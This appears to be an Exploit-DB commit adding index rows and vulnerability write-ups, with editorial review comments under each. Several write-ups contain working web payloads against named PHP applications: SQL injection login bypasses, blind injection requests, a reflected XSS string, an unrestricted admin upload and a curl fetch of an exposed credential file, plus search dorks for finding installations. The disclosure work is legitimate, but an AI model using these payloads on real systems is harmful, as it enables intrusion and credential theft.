Updated 01_24_2014

Offensive Security 2014-01-24 04:30:44 +00:00
parent 5de5e59242
commit b692692c1c
13 changed files with 381 additions and 0 deletions


@ -27882,6 +27882,7 @@ id,file,description,date,author,platform,type,port
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure Vulnerability",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow Vulnerability",2008-01-23,"Gynvael Coldwind",linux,dos,0
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
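Review bot: the 31054 row, whose text file is added further down in this commit, is filed under `platforms/linux/dos/` and typed `dos`, yet its description is a "Remote Buffer Overflow" and 31054.txt says attackers can "execute arbitrary code in the context of an application using the library"; either move the row to `remote`, as the 31051-31053 rows above it are, or say in the description that the attached sample only crashes the parser. Separately, the 31055 context row has a trailing space inside its author field (`"AmnPardaz "`), which a later cleanup could trim.
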
@ -27946,6 +27947,7 @@ id,file,description,date,author,platform,type,port
31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability",2008-02-06,"Luigi Auriemma",windows,remote,0
31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0
31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component 'gid' Parameter SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0
31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0
31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 'subpage' Parameter Multiple Local File Include Vulnerabilities",2008-02-08,"Alexandr Polyakov",php,webapps,0
31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 'id' Parameter Cross Site Scripting Vulnerability",2008-02-08,Psiczn,php,webapps,0
31125,platforms/php/webapps/31125.txt,"Joovili 2.1 'members_help.php' Remote File Include Vulnerability",2008-02-08,Cr@zy_King,php,webapps,0
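Review bot: the 31122 row (Ipswitch Instant Messaging 2.0.8.1) is filed under `platforms/windows/dos/`, but the 31122.txt added at the end of this commit lists a format-string vulnerability and an arbitrary file overwrite alongside the denial of service and says attackers can "execute arbitrary code"; `dos` undersells the entry, so either reclassify it to `remote` or narrow the description to the DoS. "Multiple Security Vulnerabilities" also gives no hint of the three issue classes the text names; listing them in the description would make the index searchable.
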
@ -27955,9 +27957,19 @@ id,file,description,date,author,platform,type,port
31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x Installation Information Disclosure Vulnerability",2008-02-08,"Brook Powers",php,webapps,0
31130,platforms/multiple/remote/31130.txt,"Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability",2008-02-09,"John Kew",multiple,remote,0
31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 'index.php' SQL Injection and Cross-Site Scripting Vulnerabilities",2008-02-09,Houssamix,php,webapps,0
31132,platforms/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote,0
31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery Vulnerability",2008-02-11,nnposter,hardware,remote,0
31134,platforms/php/webapps/31134.txt,"VWar 1.5 'calendar.php' SQL Injection Vulnerability",2008-02-11,Pouya_Server,php,webapps,0
31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities",2008-02-11,breaker_unit,php,webapps,0
31136,platforms/multiple/dos/31136.txt,"cyan soft Multiple Applications Format String Vulnerability and Denial of Service Vulnerability",2008-02-11,"Luigi Auriemma",multiple,dos,0
31137,platforms/php/webapps/31137.txt,"Joomla! and Mambo com_comments Component 0.5.8.5g 'id' Parameter SQL Injection Vulnerability",2008-02-11,CheebaHawk215,php,webapps,0
31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0
31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0
31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
31141,platforms/php/webapps/31141.txt,"godontologico 5 - SQL Injection (0day)",2014-01-23,vinicius777,php,webapps,0
31142,platforms/php/webapps/31142.txt,"Simple e-document 1.31 - Login bypass",2014-01-23,vinicius777,php,webapps,0
31143,platforms/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,php,webapps,0
31144,platforms/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0
31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0
31147,platforms/php/webapps/31147.txt,"Adult Webmaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0
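Review bot: the 31141 row's description ("godontologico 5 - SQL Injection (0day)") omits the authenticated file-upload issue that 31141.txt documents in its header block, and "(0day)" is a disclosure-status claim rather than a vulnerability class; suggest `godontologico 5 - SQL Injection / Authenticated Arbitrary File Upload` and dropping the tag. Likewise the 31145 row is the only one of the ten new rows that names the affected script in the description ("(login.php)"); either do that for every row whose text names a script (31140, 31143, 31144, 31146 all do) or for none, so the descriptions stay consistent.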



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27718/info
ExtremeZ-IP File and Print servers are prone to multiple vulnerabilities including denial-of-service and information-disclosure issues.
Attackers can exploit these issues to cause denial-of-service conditions or to obtain potentially sensitive information.
These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15.
http://www.exploit-db.com/sploits/31132.zip
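Review bot: the affected-version sentence says the issues affect versions "prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15", which makes 5.1.2x15 the first fixed build, while the files.csv row in this commit describes the entry as "5.1.2 x15 Multiple Vulnerabilities"; reconcile the two so the row reads `< 5.1.2x15`. The file otherwise carries only a pointer to `31132.zip`; recording the archive's size or a hash next to the link would let readers verify they have the intended artifact.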

platforms/linux/dos/31054.txt Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27417/info
The SDL_image library is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. The issue occurs when handling malformed GIF images.
Attackers can leverage this issue to execute arbitrary code in the context of an application using the library. Successful exploits will compromise the application and possibly the underlying computer. Failed attacks will cause denial-of-service conditions.
Versions prior to SDL_image 1.2.7 are vulnerable.
http://www.exploit-db.com/sploits/31054.gif
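Review bot: "Versions prior to SDL_image 1.2.7 are vulnerable" agrees with the files.csv row's "SDL_image 1.2.6", but the row would be clearer as `SDL_image <= 1.2.6`, matching the `<=` convention of the neighbouring 31052 and 31053 rows. The entry also depends entirely on the external `31054.gif`; one sentence on what the sample triggers (the "LWZ Minimum Code Size" field that the csv description names, which the text here never mentions) would make the file useful on its own.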


@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/27728/info
Multiple cyan soft products are affected by a format-string vulnerability because they fail to adequately sanitize user-supplied input before passing it as the format-specifier to a formatted-printing function.
These applications are also affected by a denial-of-service vulnerability because they fail to adequately handle certain commands during the start of a connection.
Attackers can leverage these issues to execute arbitrary code in the context of the application or to terminate the application. Successful attacks will compromise the applications or deny access to legitimate users.
The following applications are affected:
Opium4 OPI Server 4.10.1028 and prior
cyanPrintIP Easy OPI 4.10.1030 and prior
cyanPrintIP Professional 4.10.1030 and prior
cyanPrintIP Workstation 4.10.836 and prior
cyanPrintIP Standard 4.10.940 and prior
cyanPrintIP Basic 4.10.1030 and prior
http://www.exploit-db.com/sploits/31136.zip
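Review bot: the affected-version list is the most useful part of this entry, but the files.csv row only says "cyan soft Multiple Applications"; naming the product lines (Opium4 OPI Server, cyanPrintIP) in the row description would make the index searchable by product. The list also gives no fixed version: "and prior" states the last vulnerable build of each product but not the first safe one, which is what someone patching against this needs.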

platforms/php/webapps/31140.txt Executable file

@ -0,0 +1,22 @@
# Exploit Title: iTechClassifieds v3.03.057 - SQL Injection
# Date: 23/01/2014
# Exploit Author: vinicius777
# Vendor Homepage: http://itechscripts.com/download.html
# Software Link: http://itechscripts.com/downloads/download_itechclassifieds.html
# Version: 3.03.057
[1] SQL Injection - PreviewNun
PoC: http://localhost/iTechClassifieds_v3/ChangeEmail.php?PreviewNum=1' [SQL INJECTION]
[2] SQL Injection - CatID
PoC: http://localhost/iTechClassifieds_v3/ViewCat.php?CatID=[SQL INJECTION]
#
#
# Greetz to g0tm1lk and TheColonial.
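Review bot: the heading "[1] SQL Injection - PreviewNun" does not match the parameter name in the PoC on the next line (`PreviewNum=1'`); correct it to `PreviewNum`. This is also the only vinicius777 submission in the commit without a "Vulnerable Code" section, so a reader cannot confirm the sink for either parameter or see why the `PreviewNum` PoC carries a closing `'` while the `CatID` one does not; add the relevant query lines from ChangeEmail.php and ViewCat.php as the other files do.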

platforms/php/webapps/31141.txt Executable file

@ -0,0 +1,56 @@
########################################################################################
[+] Exploit: 0day godontologico v5 - SQL Inject #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail - @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/godontologico/ #
[+] Google D0rks: "Smile Odonto - Enhancing your smile - www.smileodonto.com.br" #
[+] Google D0rks: "Smile Odonto ® - Valorizando seu sorriso - www.smileodonto.com.br" #
########################################################################################
### Mummy bought me a new hat today #
You can considerate it a 0day! Once logged as 'admin' browse to 'Utilites' -> 'Files' -> 'Clinic Files', upload whatever you want to, access it by clicking in 'View File' or browse directly through 'http://xxx/arquivos/daclinica/files. Enjoy it xD ###
[1] Sql Injection POST Time Based Blind
#Note: Time based Injection on POST requests as indicated on the output. You might use sqlmap -l to load it though. Admin hashes under Table funcionarios' on column senha'.
PoC:
POST /gco/wallpapers/index_ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/gco/
Content-Length: 61
Cookie: __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sLogin=admin; bLicense53=true; ccss=2; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; mySession_ID=rkc83o3o3e5df60aoocpb2bqb1; groupoffice=u8q9fb14k1jqvl0vtaidqr3va1; PHPSESSID=pk5053kt9fh1p1jm8kcvn6kh05; Loggedin=True
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
usuario=['SQL INJECTION']&senha=%70%61%73%73&login=%4C%6F%67%69%6E
Vulnerable Code:
[+] wallpapers/index_ajax.php
$nivel = 'Funcionario';
$row = mysql_fetch_array(mysql_query("SELECT * FROM `funcionarios` WHERE `usuario` = '$_POST[usuario]'"));
if($row[nome] == "") {
$nivel = 'Dentista';
$row = mysql_fetch_array(mysql_query("SELECT * FROM `dentistas` WHERE `usuario` = '$_POST[usuario]'"));
if($row[nome] == "") {
//echo "<scr"."ipt>alert('Login ou senha incorretos!'); Ajax('wallpapers/index', 'conteudo', '')</scr"."ipt>";
}
#
#
# Greetz to g0tm1lk and TheColonial.
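Review bot: the Cookie header in the PoC request carries session cookies from unrelated applications on the author's test machine (`ck_login_theme_20=Sugar5`, `groupoffice`, `ws_session`, `mySession_ID`, `res_session`), none of which the `index_ajax.php` request needs; trim the request to the cookies the target actually sets so the file does not publish stray tokens and so `sqlmap -l` replays a minimal request. The "Vulnerable Code" excerpt is also cut off inside two nested `if($row[nome] == "")` blocks with only one closing brace, and the note above it has unbalanced quotes ("Table funcionarios' on column senha'").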

platforms/php/webapps/31142.txt Executable file

@ -0,0 +1,43 @@
##########################################################################
[+] Exploit: Simple e-document v1.31 Login Bypass #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777sec #
[+] version: Simple e-document v1.31 #
[+] Vendor Homepage: http://sourceforge.net/projects/simplee-doc/files/ #
##########################################################################
[1] Sql Injection on username field
PoC: username=-4731' OR (2708=2708)#
# Burp output
POST /simple_e_document_v_1_31/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/simple_e_document_v_1_31/index.php
Cookie: username=-4731%27+OR+%282708%3D2708%29%23; access=3; __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; PHPSESSID=unqjr3tdi0tbgl3if801atjhl7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
username=-4731%27+OR+%282708%3D2708%29%23&password=&op=login&Submit=Login
Vulnerable Code:
[+] login.php
$username= stripslashes($_POST['username']);
$password= stripslashes($_POST['password']);
$r_password = md5($password);
$sql = "SELECT * From edocphp_users WHERE username='$username' AND password ='$r_password'";
#
#
# Greetz to g0tm1lk and TheColonial.
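Review bot: the "Vulnerable Code" block pins down the cause (`stripslashes()` is the only processing applied to `$_POST['username']` before it is interpolated into the SELECT, and `password` is compared by MD5 only), but the entry never states the fix; a one-line remediation such as a parameterized query in place of the string-built `$sql` would make the page useful to someone triaging it. As in 31141, the Cookie header repeats the same set of unrelated session cookies plus a `username=` cookie duplicating the payload; the POST body on its own is the reproducer.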

platforms/php/webapps/31143.txt Executable file

@ -0,0 +1,27 @@
##########################################################################
[+] Exploit: PizzaInn_Project - SQL Injection #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/restaurantmis/ #
##########################################################################
[1] Sql Injection Time Based Blind
PoC: http://127.0.0.1/reserve-exec.php?id=1' [SQL Injection]
Vulnerable Code:
[+] reserve-exec.php
$id = $_GET['id'];
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry)
#
#
# Greetz to g0tm1lk and TheColonial.
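Review bot: the excerpt shows only `$id = $_GET['id'];`, but the INSERT interpolates six more variables (`$table_id`, `$partyhall_id`, `$date`, `$time`, `$table_flag`, `$partyhall_flag`) whose source is not shown, so the reader cannot tell whether `id` is the only injectable parameter; include the lines that assign them. `mysql_query($qry)` is also missing its trailing semicolon, which suggests the snippet was retyped rather than copied from reserve-exec.php.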

platforms/php/webapps/31144.txt Executable file

@ -0,0 +1,27 @@
########################################################################################
[+] Exploit: mySeatXT 0.2134 #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/myseat #
########################################################################################
[1] Sql Injection
PoC: http://localhost/mySeatXT/web/ajax/autocomplete_res.php?term=99' ['SQL INJECT']
Vulnerable Code:
[+] autocomplete_res.php
$sql = "SELECT * FROM reservations WHERE reservation_guest_name LIKE '".$_GET['term']."%' GROUP BY reservation_guest_name ";
$fetch = mysql_query($sql);
#
#
# Greetz to g0tm1lk and TheColonial.
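Review bot: the header line "[+] Exploit: mySeatXT 0.2134 #" omits the vulnerability class that the files.csv row and the "[1] Sql Injection" heading carry; make it `mySeatXT 0.2134 - SQL Injection` for consistency with the other headers in this commit. The code excerpt is sufficient as it stands: `$_GET['term']` is concatenated straight into the LIKE clause of `$sql`, which is all a reader needs to confirm the finding.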

platforms/php/webapps/31145.txt Executable file

@ -0,0 +1,48 @@
########################################################################################
[+] Exploit: Easy POS System - SQL Injection #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/easypossystem/ #
########################################################################################
[1] Sql Injection POST Time Based Blind
#Note: Time based Injection on POST requests using burp, as output indicated. You might use sqlmap -l to load it though.
PoC:
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/login.php
Cookie: __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sLogin=admin; bLicense53=true; ccss=2; ckPLC=YTo0OntzOjY6ImtleV9pZCI7czoyMzoiZjEzYTUwNDMxYTU5Njk2MDdiYWQxNzgiO3M6NzoidXNlcl9pZCI7czoxOiIxIjtzOjEwOiJ1c2VyX2FnZW50IjtzOjgxOiJNb3ppbGxhLzUuMCAoWDExOyBMaW51eCBpNjg2OyBydjoyMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzIyLjAgSWNld2Vhc2VsLzIyLjAiO3M6NzoibGFzdF9pcCI7czozOiI6OjEiO30%3D; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; mySession_ID=rkc83o3o3e5df60aoocpb2bqb1; groupoffice=u8q9fb14k1jqvl0vtaidqr3va1; PHPSESSID=pk5053kt9fh1p1jm8kcvn6kh05; Loggedin=True; ICMSSESSION=r9hvp4g43vra6krgbrhmpdpb57; cunity_sess%2Fvar%2Fwww=khgb25qkkbocjd2q9dj4c8smh7; theme=15fde18a36dda46789cc971f08ead1d78bc9f55c%7Edefault; session=s4c5dj9pq24vk1b23ar59bnhs6; PHPAdvocat=1iko66spebalanv8teljc4ka26
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
emailid=admin%40admin.com&password=admin&submit=Submit
Vulnerable Code:
[+] login.php
if(isset($_POST['submit'])){
$emailid = stripslashes($_POST['emailid']);
$password = stripslashes($_POST['password']);
//echo "shop id = ".$shopid;
$sqlrec = "select * from users where emailid = '".$emailid."' and password = '".$password."'";
$resrec = mysql_query($sqlrec);
$rowuser = mysql_fetch_assoc($resrec);
#
#
# Greetz to g0tm1lk and TheColonial.
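Review bot: the note says the injection point is "as output indicated", but the PoC body (`emailid=admin%40admin.com&password=admin&submit=Submit`) contains no injection marker, unlike every other PoC in this commit, so the reader cannot tell whether `emailid`, `password` or both are injectable; mark the parameter the way the other files do. The excerpt also shows `password = '".$password."'` compared as plaintext in `$sqlrec`, meaning credentials are stored unhashed, which is a second finding worth a line of its own.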

platforms/php/webapps/31146.txt Executable file

@ -0,0 +1,53 @@
################################################################
[+] Exploit: Cells v3.3 XSS Reflected & Blind SQLite Injection #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] version: Cells Blog 3.3 #
[+] Vendor Homepage: http://cells.tw #
################################################################
[+] 14/01/2014 vendor contacted
[+] 17/01/2014 no response from vendor
[+] 20/01/2014 no response from vendor
[+] 21/01/2014 Published
[1] Reflective XSS on 'msg='
PoC:
http://localhost/cells-v3-3/errmsg.php?msg= [%3C%2Fp%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cp%3E]
Vulnerable Code:
[+] errmsg.php
<?
echo "<img src='images/error.gif'>";
if (isset($_GET["msg"])){$msg=$_GET["msg"];}else{$msg="";}
if ($msg!=""){
echo "<br><br><br>".$msg;
}else{
echo "<br><br><br>You may key in something wrong.<br>Please try it again! ..... ";
echo " If you always got this message, <br>please send a <a href='pub_pubmsg.php?bgid=1'>".$face_report."</a>";
echo " to the web master.";
}
?>
[2] Blind SQLite Injection on 'pcid'
PoC:
http://localhost/cells-v3-3/user.php?pcid= [SQLite Injection]
Vulnerable Code:
[+] user.php
if($_GET["pcid"]!=""){
$sql="select * from users where cdt='n' and pcid=".$_GET["pcid"];
#
#
# Greetz to g0tm1lk and TheColonial.
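Review bot: the disclosure timeline ends with "21/01/2014 Published" while the files.csv row dates the entry 2014-01-23; state which is the original publication date so the two do not conflict. The heading "[1] Reflective XSS" should read "Reflected XSS" (the term used in the title and the csv row), and the user.php excerpt ends inside an unclosed `if($_GET["pcid"]!=""){` block; either include the closing lines or mark the excerpt as truncated.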

platforms/php/webapps/31147.txt Executable file

@ -0,0 +1,48 @@
##########################################################################
[+] Exploit:Adult Webmaster PHP - Password Disclosure #
[+] Author: vinicius777 #
[+] Email/Twitter: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/adultweb/ #
##########################################################################
[1] Administrative Credential Disclosure
PoC:
root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt
admin:3a4ebf16a4795ad258e5408bae7be341
#
Vulnerable Code:
[+] admin/common.php
// Check user existance
$pfile = fopen("userpwdadfasdfre.txt","a+");
rewind($pfile);
while (!feof($pfile)) {
$line = fgets($pfile);
$tmp = explode(':', $line);
if ($tmp[0] == $user) {
$errorText = "The selected user name is taken!";
break;
}
}
// If everything is OK -> store user data
if ($errorText == ''){
// Secure password string
$userpass = md5($pass1);
fwrite($pfile, "\r\n$user:$userpass");
}
fclose($pfile);
#
#
# Greetz to g0tm1lk and TheColonial.
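Review bot: the PoC URL `http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt` embeds the author's filesystem path (`/home/caspers/public_html/`) inside the web URL; the path that matters is the one implied by `fopen("userpwdadfasdfre.txt","a+")` in admin/common.php, i.e. `admin/userpwdadfasdfre.txt` relative to the application root, so give that instead. The excerpt already shows the root cause: the registration handler creates the credential file in the same directory as the scripts that serve the site, inside the document root, and stores unsalted MD5 hashes (`md5($pass1)`); moving the file outside the web root and using a salted, slow password hash are the fixes a reader would expect the writeup to name.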


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27677/info
Ipswitch Instant Messaging is prone to multiple security vulnerabilities, including a denial-of-service vulnerability, a format-string vulnerability, and a vulnerability that allows attackers to overwrite arbitrary files.
Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or overwrite files with arbitrary content.
These issues affect Ipswitch Instant Messaging 2.0.8.1; other versions may also be affected.
http://www.exploit-db.com/sploits/31122.zip
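Review bot: the text names three distinct issue classes (denial of service, format string, arbitrary file overwrite) but, like the other BID-sourced entries in this commit, carries only a link to `31122.zip` with no indication of what the archive contains or which issue each file in it targets; a one-line inventory of the archive, or a hash of it, would make the entry verifiable without downloading it.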